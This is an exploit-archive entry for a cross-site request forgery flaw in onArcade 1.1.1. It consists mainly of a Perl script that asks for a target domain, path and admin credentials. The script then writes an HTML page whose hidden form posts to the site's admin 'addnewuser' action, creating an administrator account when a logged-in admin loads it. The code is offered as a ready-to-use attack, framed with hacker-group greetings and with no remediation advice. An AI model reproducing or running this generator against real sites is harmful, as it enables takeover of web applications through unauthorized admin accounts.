onArcade v1.1.1 Game CSRF (Cross-Site Request Forgery) Vulnerability

2011-05-11T00:00:00
ID 1337DAY-ID-16084
Type zdt
Reporter Or4nG.M4N
Modified 2011-05-11T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            #!usr/bin/perl
###################################################
#  Title    : onArcade v1.1.1 Game CSRF (Cross-Site Request Forgery) Vulnerability 
#  Software : onArcade Game
#  Version  : 1.1.1
#  Date     : n/a
#  Author   : Or4nG.M4n
#  visit    : or4ng3m4n.blogspot.com
##################################################
# Start Code 
print q(
+----------------------------------------+
| CSRF CREATE YOUR Exploit By 0r4Ng.M4n  |
|    visit : Or4ng3M4n.BlogSpot.com      |
+----------------------------------------+
);
# add Page name For safe Exploit
print "save as :";
$safe=<STDIN>;
# add admin name
print "admin name :";
$ad=<STDIN>; 
# add admin pass
print "admin pass :";
$ps=<STDIN>;
# add admin email
print "admin Email :";
$em=<STDIN>;
# add host domain
print "domain :";
$ho=<STDIN>;
# add path script : if you don't add path just Entr
print "path :";
$ph=<STDIN>;
open(CREATE,">>$safe");
print CREATE "
<HTML><HEAD><TITLE>Exploit .. By Or4nG.M4n</TITLE>
<form action='http://$ho/$ph/admin/index.php?action=addnewuser' method='POST' name='form'>
<input type='hidden' value='$ad' name='eusername' ></td>
<input type='hidden' value='$ps' name='euserpassword' ></td>
<input type='hidden' value='$em' name='euseremail' >
<select name='eusergroup'><option value='2'></option></select></td>
<select name='euserstatus'><option value='1'></option></select></td>
<input type='submit' name='submit' value='add' ></td>";
close(CREATE);
print "d0n3\n";
print q(
 +---------------------------------------------------+
 |  # -------------[GreEtz & Thnks]------------- #   | 
 | Greetz : Fox , Lagripe-dz , SarBoT511 , SadHaCkEr |
 | i-Hmx , xss mAn , Cyb3r-sA , Dr.TaiGar , h3llc0d3 |
 |        BiG Thnks : sa^dev!L , Lagripe-dz          |
 +---------------------------------------------------+
 | or4ng3m4n.blogspot.com | sec4ever | v4-team | 7rs |
);
# End Code



#  0day.today [2016-04-20]  #